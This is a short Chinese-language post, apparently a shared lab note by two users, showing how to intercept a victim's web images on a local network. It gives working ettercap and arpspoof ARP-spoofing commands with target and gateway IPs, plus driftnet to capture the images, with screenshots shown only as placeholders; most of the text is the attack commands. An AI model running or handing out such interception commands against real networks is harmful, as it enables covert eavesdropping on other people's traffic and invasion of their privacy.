1.blackeagle 用的是 ettercap - arp欺骗 + driftnet - 图片捕获
image.png直接 ettercap
ettercap -i wlan0 -Tq -M arp:remote /目标的ip//网关/
命令:
ettercap -i wlan0 -Tq -M arp:remote /172.23.0.227//172.23.0.1/
先打开窗口输入
driftnet –I eth0 -b
image.png
监控成功:
image.png
结果:
image.png
2. Flying_fish
用的是 Arpspoof + driftnet
命令:
Arpspoof –I eth0 (这是网卡设备) –t 192.168.1.1(网关)192.168.1.100(受害者。。。)
监控成功:
image.png
先打开窗口输入
driftnet –I eth0
image.png
网友评论